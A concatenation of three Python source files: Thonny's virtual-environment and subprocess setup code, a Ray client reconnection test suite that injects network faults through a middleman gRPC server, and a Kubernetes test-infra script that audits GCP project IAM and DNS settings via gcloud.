CPythonProxy.__init__(self, get_private_venv_executable())
def _prepare_private_venv(self):
path = get_private_venv_path()
if os.path.isdir(path) and os.path.isfile(os.path.join(path, "pyvenv.cfg")):
self._check_upgrade_private_venv(path)
else:
self._create_private_venv(
path, "Please wait!\nThonny prepares its virtual environment."
)
def _check_upgrade_private_venv(self, path):
# If home is wrong then regenerate
# If only micro version is different, then upgrade
info = _get_venv_info(path)
if not is_same_path(info["home"], os.path.dirname(sys.executable)):
self._create_private_venv(
path,
"Thonny's virtual environment was created for another interpreter.\n"
+ "Regenerating the virtual environment for current interpreter.\n"
+ "(You may need to reinstall your 3rd party packages)\n"
+ "Please wait!.",
clear=True,
)
else:
venv_version = tuple(map(int, info["version"].split(".")))
sys_version = sys.version_info[:3]
assert venv_version[0] == sys_version[0]
assert venv_version[1] == sys_version[1]
if venv_version[2] != sys_version[2]:
self._create_private_venv(
path,
"Please wait!\nUpgrading Thonny's virtual environment.",
upgrade=True,
)
def _create_private_venv(self, path, description, clear=False, upgrade=False):
# Don't include system site packages
# This way all students will have similar configuration
# independently of system Python (if Thonny is used with system Python)
# NB! Cant run venv.create directly, because in Windows
# it tries to link venv to thonny.exe.
# Need to run it via proper python
args = ["-m", "venv"]
if clear:
args.append("--clear")
if upgrade:
args.append("--upgrade")
try:
# pylint: disable=unused-variable
import ensurepip # @UnusedImport
except ImportError:
args.append("--without-pip")
args.append(path)
proc = create_frontend_python_process(args)
from thonny.ui_utils import SubprocessDialog
dlg = SubprocessDialog(
get_workbench(), proc, "Preparing the backend", long_description=description
)
try:
ui_utils.show_dialog(dlg)
except Exception:
# if using --without-pip the dialog may close very quickly
# and for some reason wait_window would give error then
logging.exception("Problem with waiting for venv creation dialog")
get_workbench().become_active_window() # Otherwise focus may get stuck somewhere
bindir = os.path.dirname(get_private_venv_executable())
# create private env marker
marker_path = os.path.join(bindir, "is_private")
with open(marker_path, mode="w") as fp:
fp.write("# This file marks Thonny-private venv")
# Create recommended pip conf to get rid of list deprecation warning
# https://github.com/pypa/pip/issues/4058
pip_conf = "pip.ini" if running_on_windows() else "pip.conf"
with open(os.path.join(path, pip_conf), mode="w") as fp:
fp.write("[list]\nformat = columns")
assert os.path.isdir(path)
class SameAsFrontendCPythonProxy(CPythonProxy):
def __init__(self, clean):
CPythonProxy.__init__(self, get_frontend_python())
def fetch_next_message(self):
msg = super().fetch_next_message()
if msg and "welcome_text" in msg:
if using_bundled_python():
msg["welcome_text"] += " (bundled)"
else:
msg["welcome_text"] += " (" + self._executable + ")"
return msg
class CustomCPythonProxy(CPythonProxy):
def __init__(self, clean):
executable = get_workbench().get_option("CustomInterpreter.path")
# Rembember the usage of this non-default interpreter
used_interpreters = get_workbench().get_option("CustomInterpreter.used_paths")
if executable not in used_interpreters:
used_interpreters.append(executable)
get_workbench().set_option("CustomInterpreter.used_paths", used_interpreters)
CPythonProxy.__init__(self, executable)
def fetch_next_message(self):
msg = super().fetch_next_message()
if msg and "welcome_text" in msg:
msg["welcome_text"] += " (" + self._executable + ")"
return msg
def get_private_venv_path():
if "thonny" in sys.executable.lower():
prefix = "BundledPython"
else:
prefix = "Python"
return os.path.join(
THONNY_USER_DIR, prefix + "%d%d" % (sys.version_info[0], sys.version_info[1])
)
def get_private_venv_executable():
venv_path = get_private_venv_path()
if running_on_windows():
exe = os.path.join(venv_path, "Scripts", WINDOWS_EXE)
else:
exe = os.path.join(venv_path, "bin", "python3")
return exe
def _get_venv_info(venv_path):
cfg_path = os.path.join(venv_path, "pyvenv.cfg")
result = {}
with open(cfg_path, encoding="UTF-8") as fp:
for line in fp:
if "=" in line:
key, val = line.split("=", maxsplit=1)
result[key.strip()] = val.strip()
return result
def using_bundled_python():
return is_bundled_python(sys.executable)
def is_bundled_python(executable):
return os.path.exists(
os.path.join(os.path.dirname(executable), "thonny_python.ini")
)
def create_backend_python_process(
args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
):
"""Used for running helper commands (eg. pip) on CPython backend.
Assumes current backend is CPython."""
# TODO: if backend == frontend, then delegate to create_frontend_python_process
python_exe = get_runner().get_local_executable()
env = get_environment_for_python_subprocess(python_exe)
env["PYTHONIOENCODING"] = "utf-8"
env["PYTHONUNBUFFERED"] = "1"
# TODO: remove frontend python from path and add backend python to it
return _create_python_process(python_exe, args, stdin, stdout, stderr, env=env)
def create_frontend_python_process(
args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
):
"""Used for running helper commands (eg. for installing plug-ins on by the plug-ins)"""
python_exe = get_frontend_python().replace("pythonw.exe", "python.exe")
env = get_environment_for_python_subprocess(python_exe)
env["PYTHONIOENCODING"] = "utf-8"
env["PYTHONUNBUFFERED"] = "1"
return _create_python_process(python_exe, args, stdin, stdout, stderr)
def _create_python_process(
python_exe,
args,
stdin=None,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=False,
env=None,
universal_newlines=True,
):
cmd = [python_exe] + args
if running_on_windows():
creationflags = subprocess.CREATE_NEW_PROCESS_GROUP
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
else:
startupinfo = None
creationflags = 0
proc = subprocess.Popen(
cmd,
stdin=stdin,
stdout=stdout,
stderr=stderr,
shell=shell,
env=env,
universal_newlines=universal_newlines,
startupinfo=startupinfo,
creationflags=creationflags,
)
proc.cmd = cmd
return proc
class BackendTerminatedError(Exception):
def __init__(self, returncode):
Exception.__init__(self)
self.returncode = returncode
def get_frontend_python():
return sys.executable.replace("thonny.exe", "python.exe").replace(
"pythonw.exe", "python.exe"
)
def is_venv_interpreter_of_current_interpreter(executable):
for location in [".", ".."]:
cfg_path = os.path.join(location, "pyvenv.cfg")
if os.path.isfile(cfg_path):
with open(cfg_path) as fp:
content = fp.read()
for line in content.splitlines():
if line.replace(" ", "").startswith("home="):
_, home = line.split("=", maxsplit=1)
home = home.strip()
if os.path.isdir(home) and os.path.samefile(home, sys.prefix):
return True
return False
def get_environment_for_python_subprocess(target_executable):
overrides = get_environment_overrides_for_python_subprocess(target_executable)
return get_environment_with_overrides(overrides)
def get_environment_with_overrides(overrides):
env = os.environ.copy()
for key in overrides:
if overrides[key] is None and key in env:
del env[key]
else:
assert isinstance(overrides[key], str)
if key.upper() == "PATH":
update_system_path(env, overrides[key])
else:
env[key] = overrides[key]
return env
def get_environment_overrides_for_python_subprocess(target_executable):
"""Take care of not not confusing different interpreter
with variables meant for bundled interpreter"""
# At the moment I'm tweaking the environment only if current
# exe is bundled for Thonny.
# In remaining cases it is user's responsibility to avoid
# calling Thonny with environment which may be confusing for
# different Pythons called in a subprocess.
this_executable = sys.executable.replace("pythonw.exe", "python.exe")
target_executable = target_executable.replace("pythonw.exe", "python.exe")
interpreter_specific_keys = [
"TCL_LIBRARY",
"TK_LIBRARY",
"LD_LIBRARY_PATH",
"DYLD_LIBRARY_PATH",
"SSL_CERT_DIR",
"SSL_CERT_FILE",
"PYTHONHOME",
"PYTHONPATH",
"PYTHONNOUSERSITE",
"PYTHONUSERBASE",
]
result = {}
if os.path.samefile(
target_executable, this_executable
) or is_venv_interpreter_of_current_interpreter(target_executable):
# bring out some important variables so that they can
# be explicitly set in macOS Terminal
# (If they are set then it's most likely because current exe is in Thonny bundle)
for key in interpreter_specific_keys:
if key in os.environ:
result[key] = os.environ[key]
# never pass some variables to different interpreter
# (even if it's venv or symlink to current one)
if not is_same_path(target_executable, this_executable):
for key in [
"PYTHONPATH",
"PYTHONHOME",
"PYTHONNOUSERSITE",
"PYTHONUSERBASE",
]:
if key in os.environ:
result[key] = None
else:
# interpreters are not related
# interpreter specific keys most likely would confuse other interpreter
for key in interpreter_specific_keys:
if key in os.environ:
result[key] = None
# some keys should be never passed
for key in [
"PYTHONSTARTUP",
"PYTHONBREAKPOINT",
"PYTHONDEBUG",
"PYTHONNOUSERSITE",
"PYTHONASYNCIODEBUG",
]:
if key in os.environ:
result[key] = None
# venv may not find (correct) Tk without assistance (eg. in Ubuntu)
if is_venv_interpreter_of_current_interpreter(target_executable):
try:
if "TCL_LIBRARY" not in os.environ or "TK_LIBRARY" not in os.environ:
result["TCL_LIBRARY"] = get_workbench().tk.exprstring("$tcl_library")
result["TK_LIBRARY"] = get_workbench().tk.exprstring("$tk_library")
except Exception:
logging.exception("Can't compute Tcl/Tk library location")
return result
|
test_client_reconnect.py
|
from concurrent import futures
import asyncio
import contextlib
import os
import threading
import sys
import grpc
import numpy as np
import time
import random
import pytest
from typing import Any, Callable, Optional
from unittest.mock import patch
import ray
import ray.core.generated.ray_client_pb2 as ray_client_pb2
import ray.core.generated.ray_client_pb2_grpc as ray_client_pb2_grpc
from ray.util.client.common import CLIENT_SERVER_MAX_THREADS, GRPC_OPTIONS
import ray.util.client.server.server as ray_client_server
from ray._private.client_mode_hook import disable_client_hook
# At a high level, these tests rely on an extra RPC server sitting
# between the client and the real Ray server to inject errors, drop responses
# and drop requests, i.e. at a high level:
# Ray Client <-> Middleman Server <-> Proxy Server
# Type for middleman hooks used to inject errors
Hook = Callable[[Any], None]
class MiddlemanDataServicer(ray_client_pb2_grpc.RayletDataStreamerServicer):
"""
Forwards all requests to the real data servicer. Useful for injecting
errors between a client and server pair.
"""
def __init__(
self, on_response: Optional[Hook] = None, on_request: Optional[Hook] = None
):
"""
Args:
on_response: Optional hook to inject errors before sending back a
response
"""
self.stub = None
self.on_response = on_response
self.on_request = on_request
def set_channel(self, channel: grpc.Channel) -> None:
self.stub = ray_client_pb2_grpc.RayletDataStreamerStub(channel)
def _requests(self, request_iterator):
for req in request_iterator:
if self.on_request:
self.on_request(req)
yield req
def Datapath(self, request_iterator, context):
try:
for response in self.stub.Datapath(
self._requests(request_iterator), metadata=context.invocation_metadata()
):
if self.on_response:
self.on_response(response)
yield response
except grpc.RpcError as e:
context.set_code(e.code())
context.set_details(e.details())
class MiddlemanLogServicer(ray_client_pb2_grpc.RayletLogStreamerServicer):
"""
Forwards all requests to the real log servicer. Useful for injecting
errors between a client and server pair.
"""
def __init__(self, on_response: Optional[Hook] = None):
"""
Args:
on_response: Optional hook to inject errors before sending back a
response
"""
self.stub = None
self.on_response = on_response
def set_channel(self, channel: grpc.Channel) -> None:
self.stub = ray_client_pb2_grpc.RayletLogStreamerStub(channel)
def Logstream(self, request_iterator, context):
try:
for response in self.stub.Logstream(
request_iterator, metadata=context.invocation_metadata()
):
if self.on_response:
self.on_response(response)
yield response
except grpc.RpcError as e:
context.set_code(e.code())
context.set_details(e.details())
class MiddlemanRayletServicer(ray_client_pb2_grpc.RayletDriverServicer):
"""
Forwards all requests to the raylet driver servicer. Useful for injecting
errors between a client and server pair.
"""
def __init__(
self, on_request: Optional[Hook] = None, on_response: Optional[Hook] = None
):
"""
Args:
on_request: Optional hook to inject errors before forwarding a
request
on_response: Optional hook to inject errors before sending back a
response
"""
self.stub = None
self.on_request = on_request
self.on_response = on_response
def set_channel(self, channel: grpc.Channel) -> None:
self.stub = ray_client_pb2_grpc.RayletDriverStub(channel)
def _call_inner_function(
self, request: Any, context, method: str
) -> Optional[ray_client_pb2_grpc.RayletDriverStub]:
if self.on_request:
self.on_request(request)
try:
response = getattr(self.stub, method)(
request, metadata=context.invocation_metadata()
)
except grpc.RpcError as e:
context.set_code(e.code())
context.set_details(e.details())
raise
if self.on_response and method != "GetObject":
# GetObject streams response, handle on_response separately
self.on_response(response)
return response
def Init(self, request, context=None) -> ray_client_pb2.InitResponse:
return self._call_inner_function(request, context, "Init")
def KVPut(self, request, context=None) -> ray_client_pb2.KVPutResponse:
return self._call_inner_function(request, context, "KVPut")
def KVGet(self, request, context=None) -> ray_client_pb2.KVGetResponse:
return self._call_inner_function(request, context, "KVGet")
def KVDel(self, request, context=None) -> ray_client_pb2.KVDelResponse:
return self._call_inner_function(request, context, "KVDel")
def KVList(self, request, context=None) -> ray_client_pb2.KVListResponse:
return self._call_inner_function(request, context, "KVList")
def KVExists(self, request, context=None) -> ray_client_pb2.KVExistsResponse:
return self._call_inner_function(request, context, "KVExists")
def ListNamedActors(
self, request, context=None
) -> ray_client_pb2.ClientListNamedActorsResponse:
return self._call_inner_function(request, context, "ListNamedActors")
def ClusterInfo(self, request, context=None) -> ray_client_pb2.ClusterInfoResponse:
return self._call_inner_function(request, context, "ClusterInfo")
def Terminate(self, req, context=None):
return self._call_inner_function(req, context, "Terminate")
def GetObject(self, request, context=None):
for response in self._call_inner_function(request, context, "GetObject"):
if self.on_response:
self.on_response(response)
yield response
def PutObject(
self, request: ray_client_pb2.PutRequest, context=None
) -> ray_client_pb2.PutResponse:
return self._call_inner_function(request, context, "PutObject")
def WaitObject(
self, request: ray_client_pb2.WaitRequest, context=None
) -> ray_client_pb2.WaitResponse:
return self._call_inner_function(request, context, "WaitObject")
def Schedule(
self, task: ray_client_pb2.ClientTask, context=None
) -> ray_client_pb2.ClientTaskTicket:
return self._call_inner_function(task, context, "Schedule")
class MiddlemanServer:
"""
Helper class that wraps the RPC server that middlemans the connection
between the client and the real ray server. Useful for injecting
errors between a client and server pair.
"""
def __init__(
self,
listen_addr: str,
real_addr,
on_log_response: Optional[Hook] = None,
on_data_request: Optional[Hook] = None,
on_data_response: Optional[Hook] = None,
on_task_request: Optional[Hook] = None,
on_task_response: Optional[Hook] = None,
):
"""
Args:
listen_addr: The address the middleman server will listen on
real_addr: The address of the real ray server
on_log_response: Optional hook to inject errors before sending back
a log response
on_data_response: Optional hook to inject errors before sending
back a data response
on_task_request: Optional hook to inject errors before forwarding
a raylet driver request
on_task_response: Optional hook to inject errors before sending
back a raylet driver response
"""
self.listen_addr = listen_addr
self.real_addr = real_addr
self.server = grpc.server(
futures.ThreadPoolExecutor(max_workers=CLIENT_SERVER_MAX_THREADS),
options=GRPC_OPTIONS,
)
self.task_servicer = MiddlemanRayletServicer(
on_response=on_task_response, on_request=on_task_request
)
self.data_servicer = MiddlemanDataServicer(
on_response=on_data_response, on_request=on_data_request
)
self.logs_servicer = MiddlemanLogServicer(on_response=on_log_response)
ray_client_pb2_grpc.add_RayletDriverServicer_to_server(
self.task_servicer, self.server
)
ray_client_pb2_grpc.add_RayletDataStreamerServicer_to_server(
self.data_servicer, self.server
)
ray_client_pb2_grpc.add_RayletLogStreamerServicer_to_server(
self.logs_servicer, self.server
)
self.server.add_insecure_port(self.listen_addr)
self.channel = None
self.reset_channel()
def reset_channel(self) -> None:
"""
Manually close and reopen the channel to the real ray server. This
simulates a disconnection between the client and the server.
"""
if self.channel:
self.channel.close()
self.channel = grpc.insecure_channel(self.real_addr, options=GRPC_OPTIONS)
grpc.channel_ready_future(self.channel)
self.task_servicer.set_channel(self.channel)
self.data_servicer.set_channel(self.channel)
self.logs_servicer.set_channel(self.channel)
def start(self) -> None:
self.server.start()
def stop(self, grace: int) -> None:
self.server.stop(grace)
@contextlib.contextmanager
def start_middleman_server(
on_log_response=None,
on_data_request=None,
on_data_response=None,
on_task_request=None,
on_task_response=None,
):
"""
Helper context that starts a middleman server listening on port 10011,
and a ray client server on port 50051.
"""
ray._inside_client_test = True
server = ray_client_server.serve("localhost:50051")
middleman = None
try:
middleman = MiddlemanServer(
listen_addr="localhost:10011",
real_addr="localhost:50051",
on_log_response=on_log_response,
on_data_request=on_data_request,
on_data_response=on_data_response,
on_task_request=on_task_request,
on_task_response=on_task_response,
)
middleman.start()
ray.init("ray://localhost:10011")
yield middleman, server
finally:
ray._inside_client_test = False
ray.util.disconnect()
if middleman:
middleman.stop(0)
# Delete server to allow the client server to be GC'ed, which shuts
# down Ray. Then wait for Ray to shut down in the local process.
# Otherwise, the Ray cluster may stay alive until the next call to
# start_middleman_server(), become the backing Ray cluster to the
# client server, and shut down in the middle of the test case after
# GC finally catches up, leading to test failures.
server.stop(0)
del server
start = time.monotonic()
with disable_client_hook():
while ray.is_initialized():
time.sleep(1)
if time.monotonic() - start > 30:
raise RuntimeError("Failed to terminate Ray")
def test_disconnect_during_get():
"""
Disconnect the proxy and the client in the middle of a long running get
"""
@ray.remote
def slow_result():
time.sleep(20)
return 12345
def disconnect(middleman):
time.sleep(3)
middleman.reset_channel()
with start_middleman_server() as (middleman, _):
disconnect_thread = threading.Thread(target=disconnect, args=(middleman,))
disconnect_thread.start()
result = ray.get(slow_result.remote())
assert result == 12345
disconnect_thread.join()
def test_disconnects_during_large_get():
"""
Disconnect repeatedly during a large (multi-chunk) get.
"""
i = 0
started = False
def fail_every_three(_):
# Inject an error every third time this method is called
nonlocal i, started
if not started:
return
i += 1
if i % 3 == 0:
raise RuntimeError
@ray.remote
def large_result():
# 1024x1024x128 float64 matrix (1024 MiB). With 64MiB chunk size,
# it will take at least 16 chunks to transfer this object. Since
# the failure is injected every 3 chunks, this transfer can only
# work if the chunked get request retries at the last received chunk
# (instead of starting from the beginning each retry)
return np.random.random((1024, 1024, 128))
with start_middleman_server(on_task_response=fail_every_three):
started = True
result = ray.get(large_result.remote())
assert result.shape == (1024, 1024, 128)
def test_disconnects_during_large_async_get():
"""
Disconnect repeatedly during a large (multi-chunk) async get.
"""
i = 0
started = False
def fail_every_three(_):
# Inject an error every third time this method is called
nonlocal i, started
if not started:
return
i += 1
if i % 3 == 0:
raise RuntimeError
@ray.remote
def large_result():
# 1024x1024x128 float64 matrix (1024 MiB). With 64MiB chunk size,
# it will take at least 16 chunks to transfer this object. Since
# the failure is injected every 3 chunks, this transfer can only
# work if the chunked get request retries at the last received chunk
# (instead of starting from the beginning each retry)
return np.random.random((1024, 1024, 128))
with start_middleman_server(on_data_response=fail_every_three):
started = True
async def get_large_result():
return await large_result.remote()
loop = asyncio.get_event_loop()
result = loop.run_until_complete(get_large_result())
assert result.shape == (1024, 1024, 128)
def test_disconnect_during_large_put():
"""
Disconnect during a large (multi-chunk) put.
"""
i = 0
started = False
def fail_halfway(_):
# Inject an error halfway through the object transfer
nonlocal i, started
if not started:
return
i += 1
if i == 8:
raise RuntimeError
with start_middleman_server(on_data_request=fail_halfway):
started = True
objref = ray.put(np.random.random((1024, 1024, 128)))
assert i > 8 # Check that the failure was injected
result = ray.get(objref)
assert result.shape == (1024, 1024, 128)
def test_disconnect_during_large_schedule():
"""
Disconnect during a remote call with a large (multi-chunk) argument.
"""
i = 0
started = False
def fail_halfway(_):
# Inject an error halfway through the object transfer
nonlocal i, started
if not started:
return
i += 1
if i == 8:
raise RuntimeError
@ray.remote
def f(a):
return a.shape
with start_middleman_server(on_data_request=fail_halfway):
started = True
a = np.random.random((1024, 1024, 128))
result = ray.get(f.remote(a))
assert i > 8 # Check that the failure was injected
assert result == (1024, 1024, 128)
def test_valid_actor_state():
"""
Repeatedly inject errors in the middle of mutating actor calls. Check
at the end that the final state of the actor is consistent with what
we would expect had the disconnects not occurred.
"""
@ray.remote
class IncrActor:
def __init__(self):
self.val = 0
def incr(self):
self.val += 1
return self.val
i = 0
# This is to prevent erroring in the initial connection logic.
started = False
def fail_every_seven(_):
# Inject an error every seventh time this method is called
nonlocal i, started
i += 1
if i % 7 == 0 and started:
raise RuntimeError
with start_middleman_server(
on_data_response=fail_every_seven,
on_task_request=fail_every_seven,
on_task_response=fail_every_seven,
):
started = True
actor = IncrActor.remote()
for _ in range(100):
ref = actor.incr.remote()
assert ray.get(ref) == 100
def test_valid_actor_state_2():
"""
Do a full disconnect (cancel channel) every 11 requests. Failure
happens:
- before request sent: request never reaches server
- before response received: response never reaches server
- while get's are being processed
"""
@ray.remote
class IncrActor:
def __init__(self):
self.val = 0
def incr(self):
self.val += 1
return self.val
i = 0
with start_middleman_server() as (middleman, _):
def fail_every_eleven(_):
nonlocal i
i += 1
if i % 11 == 0:
middleman.reset_channel()
middleman.data_servicer.on_response = fail_every_eleven
middleman.task_servicer.on_request = fail_every_eleven
middleman.task_servicer.on_response = fail_every_eleven
actor = IncrActor.remote()
for _ in range(100):
ref = actor.incr.remote()
assert ray.get(ref) == 100
def test_noisy_puts():
"""
Randomly kills the data channel with 10% chance when receiving response
(requests made it to server, responses dropped) and checks that final
result is still consistent
"""
random.seed(12345)
with start_middleman_server() as (middleman, _):
def fail_randomly(response: ray_client_pb2.DataResponse):
if random.random() < 0.1:
raise RuntimeError
middleman.data_servicer.on_response = fail_randomly
refs = [ray.put(i * 123) for i in range(500)]
results = ray.get(refs)
for i, result in enumerate(results):
assert result == i * 123
def test_client_reconnect_grace_period():
"""
Tests that the client gives up attempting to reconnect the channel
after the grace period expires.
"""
# Lower grace period to 5 seconds to save time
with patch.dict(
os.environ, {"RAY_CLIENT_RECONNECT_GRACE_PERIOD": "5"}
), start_middleman_server() as (middleman, _):
assert ray.get(ray.put(42)) == 42
# Close channel
middleman.channel.close()
start_time = time.time()
with pytest.raises(ConnectionError):
ray.get(ray.put(42))
# Connection error should have been raised within a reasonable
# amount of time. Set to significantly higher than 5 seconds
# to account for reconnect backoff timing
assert time.time() - start_time < 20
if __name__ == "__main__":
if os.environ.get("PARALLEL_CI"):
sys.exit(pytest.main(["-n", "auto", "--boxed", "-vs", __file__]))
else:
sys.exit(pytest.main(["-sv", __file__]))
|
check_projects.py
|
#!/usr/bin/env python
# Copyright 2016 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Check properties of test projects, optionally fixing them.
Example config:
{
"IAM": {
"roles/editor": [
"serviceAccount:foo@bar.com",
"user:me@you.com",
"group:whatever@googlegroups.com"],
"roles/viewer": [...],
},
"EnableVmZonalDNS': True,
}
"""
import argparse
import collections
import json
import logging
import os.path
import re
import subprocess
import sys
import threading
from argparse import RawTextHelpFormatter
# pylint: disable=invalid-name
_log = logging.getLogger('check_project')
DEFAULT = {
'IAM': {
'roles/editor': [
'serviceAccount:kubekins@kubernetes-jenkins.iam.gserviceaccount.com',
'serviceAccount:pr-kubekins@kubernetes-jenkins-pull.iam.gserviceaccount.com'],
},
'EnableVMZonalDNS': False,
}
class RateLimitedExec(object):
"""Runs subprocess commands with a rate limit."""
def __init__(self):
self.semaphore = threading.Semaphore(10) # 10 concurrent gcloud calls
def check_output(self, *args, **kwargs):
"""check_output with rate limit"""
with self.semaphore:
return subprocess.check_output(*args, **kwargs)
def call(self, *args, **kwargs):
"""call with rate limit"""
with self.semaphore:
return subprocess.call(*args, **kwargs)
class Results(object):
"""Results of the check run"""
class Info(object):
"""Per-project information"""
def __init__(self):
self.updated = False
# errors is list of strings describing the error context
self.errors = []
# People with owners rights to update error projects
self.helpers = []
def __init__(self):
self.lock = threading.Lock()
self.projects = {} # project -> Info
@property
def errors(self):
"""Returns set of projects that have errors."""
return set(key for key in self.projects if self.projects[key].errors)
@property
def counts(self):
"""Returns count of (total, updated, error'ed) projects."""
with self.lock:
total, updated, errored = (0, 0, 0)
for info in self.projects.values():
total += 1
if info.updated:
updated += 1
if info.errors:
errored += 1
return (total, updated, errored)
def report_project(self, project):
with self.lock:
self.ensure_info(project)
def report_error(self, project, err):
with self.lock:
info = self.ensure_info(project)
info.errors.append(err)
def report_updated(self, project):
with self.lock:
info = self.ensure_info(project)
info.updated = True
def add_helper(self, project, helpers):
with self.lock:
info = self.ensure_info(project)
info.helpers = helpers
def ensure_info(self, project):
if project not in self.projects:
info = Results.Info()
self.projects[project] = info
return self.projects[project]
def run_threads_to_completion(threads):
"""Runs the given list of threads to completion."""
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def parse_args():
"""Returns parsed arguments."""
parser = argparse.ArgumentParser(
description=__doc__, formatter_class=RawTextHelpFormatter)
parser.add_argument(
'--filter', default=r'^.+\.(env|sh)$',
help='Only look for projects with the specified names')
parser.add_argument(
'--fix', action='store_true', help='Add missing memberships')
parser.add_argument(
'--verbose', action='store_true',
help='Enable verbose output')
parser.add_argument(
'config', type=get_config, default='', nargs='?',
help='Path to json configuration')
return parser.parse_args()
def get_config(string):
"""Returns configuration for project settings."""
if not string:
return DEFAULT
elif not os.path.isfile(string):
raise argparse.ArgumentTypeError('not a file: %s' % string)
with open(string) as fp:
return json.loads(fp.read())
class Checker(object):
"""Runs the checks against all projects."""
def __init__(self, config):
self.config = config
self.rl_exec = RateLimitedExec()
self.results = Results()
def run(self, filt, fix=False):
"""Checks projects for correct settings."""
def check(project, fix):
self.results.report_project(project)
# pylint: disable=no-member
for prop_class in ProjectProperty.__subclasses__():
prop = prop_class(self.rl_exec, self.results)
_log.info('Checking project %s for %s', project, prop.name())
prop.check_and_maybe_update(self.config, project, fix)
projects = self.load_projects(
'%s/../jobs' % os.path.dirname(__file__),
'%s/../boskos/resources.json' % os.path.dirname(__file__),
filt)
_log.info('Checking %d projects', len(projects))
run_threads_to_completion(
[threading.Thread(target=check, args=(project, fix))
for project in sorted(projects)])
self.log_summary()
def log_summary(self):
_log.info('====')
_log.info(
'Summary: %d projects, %d have been updated, %d have problems',
*self.results.counts)
_log.info('====')
for key in self.results.errors:
project = self.results.projects[key]
_log.info(
'Project %s needs to fix: %s', key, ','.join(project.errors))
_log.info('Helpers:')
fixers = collections.defaultdict(int)
unk = ['user:unknown']
for project in self.results.errors:
helpers = self.results.projects[project].helpers
if not helpers:
helpers = unk
for name in helpers:
fixers[name] += 1
_log.info(' %s: %s', project, ','.join(
self.sane(s) for s in sorted(helpers)))
for name, count in sorted(fixers.items(), key=lambda i: i[1]):
_log.info(' %s: %s', count, self.sane(name))
if self.results.counts[2] != 0:
sys.exit(1)
@staticmethod
def sane(member):
if ':' not in member:
raise ValueError(member)
email = member.split(':')[1]
return email.split('@')[0]
@staticmethod
def load_projects(configs, boskos, filt):
"""Scans the project directories for GCP projects to check."""
filter_re = re.compile(filt)
project_re = re.compile('^PROJECT="?([^"\r\n]+)"?$', re.MULTILINE)
projects = set()
for dirname, _, files in os.walk(configs):
for path in files:
full_path = os.path.join(dirname, path)
_log.debug('Path = %s', path)
if not filter_re.match(path):
continue
with open(full_path) as fp:
for project in project_re.findall(fp.read()):
if '{' not in project:
projects.add(project)
continue
else:
raise ValueError(project)
with open(boskos) as fp:
for rtype in json.loads(fp.read()):
if rtype['type'] == 'project':
for name in rtype['names']:
projects.add(name)
return projects
class ProjectProperty(object):
"""Base class for properties that are checked for each project.
Subclasses of this class will be checked against every project.
"""
def name(self):
"""
Returns:
human readable name of the property.
"""
raise NotImplementedError()
def check_and_maybe_update(self, config, project, fix):
"""Check and maybe update the project for the required property.
Args:
config: project configuration
project: project to check
fix: if True, update the project property.
"""
raise NotImplementedError()
class IAMProperty(ProjectProperty):
"""Project has the correct IAM properties."""
def __init__(self, rl_exec, results):
self.rl_exec = rl_exec
self.results = results
def name(self):
return 'IAM'
def check_and_maybe_update(self, config, project, fix):
if 'IAM' not in config:
return
try:
out = self.rl_exec.check_output([
'gcloud',
'projects',
'get-iam-policy',
project,
'--format=json(bindings)'])
except subprocess.CalledProcessError:
_log.info('Cannot access %s', project)
self.results.report_error(project, 'access')
return
needed = config['IAM']
bindings = json.loads(out)
fixes = {}
roles = set()
for binding in bindings['bindings']:
role = binding['role']
roles.add(role)
members = binding['members']
if role in needed:
missing = set(needed[role]) - set(members)
if missing:
fixes[role] = missing
if role == 'roles/owner':
self.results.add_helper(project, members)
missing_roles = set(needed) - roles
for role in missing_roles:
fixes[role] = needed[role]
if not fixes:
_log.info('Project %s IAM is already configured', project)
return
if not fix:
_log.info('Will not --fix %s, wanted fixed %s', project, fixes)
self.results.report_error(project, self.name())
return
updates = []
for role, members in sorted(fixes.items()):
updates.extend(
threading.Thread(target=self.update, args=(project, role, m))
for m in members)
run_threads_to_completion(updates)
def update(self, project, role, member):
cmdline = [
'gcloud', '-q', 'projects', 'add-iam-policy-binding',
'--role=%s' % role,
'--member=%s' % member,
project
]
err = self.rl_exec.call(cmdline, stdout=open('/dev/null', 'w'))
if not err:
_log.info('Added %s as %s to %s', member, role, project)
self.results.report_updated(project)
else:
_log.info('Could not update IAM for %s', project)
self.results.report_error(
project, 'update %s (role=%s, member=%s)' %
(self.name(), role, member))
class EnableVmZonalDNS(ProjectProperty):
"""Project has Zonal DNS enabled."""
def __init__(self, rl_exec, results):
self.rl_exec = rl_exec
self.results = results
def name(self):
return 'EnableVMZonalDNS'
def check_and_maybe_update(self, config, project, fix):
try:
out = self.rl_exec.check_output([
'gcloud', 'compute', 'project-info', 'describe',
'--project=' + project,
'--format=json(commonInstanceMetadata.items)'])
except subprocess.CalledProcessError:
_log.info('Cannot access %s', project)
return
enabled = False
metadata = json.loads(out)
if (metadata and metadata['commonInstanceMetadata']
and metadata['commonInstanceMetadata']['items']):
for item in metadata['commonInstanceMetadata']['items']:
if item['key'] == 'EnableVmZonalDNS':
enabled = item['value'].lower() == 'yes'
desired = config.get('EnableVMZonalDNS', False)
if desired == enabled:
_log.info(
'Project %s %s is already configured', project, self.name())
return
if not fix:
_log.info(
'Will not --fix %s, needs to change EnableVMZonalDNS to %s',
project, desired)
self.results.report_error(project, self.name())
return
if desired != enabled:
_log.info('Updating project %s EnableVMZonalDNS from %s to %s',
project, enabled, desired)
self.update(project, desired)
def update(self, project, desired):
if desired:
err = self.rl_exec.call(
['gcloud', 'compute', 'project-info', 'add-metadata',
'--metadata=EnableVmZonalDNS=Yes',
'--project=' + project],
stdout=open('/dev/null', 'w'))
else:
err = self.rl_exec.call(
['gcloud', 'compute', 'project-info', 'remove-metadata',
'--keys=EnableVmZonalDNS',
'--project=' + project],
stdout=open('/dev/null', 'w'))
if not err:
_log.info('Updated zonal DNS for %s: %s', project, desired)
self.results.report_updated(project)
else:
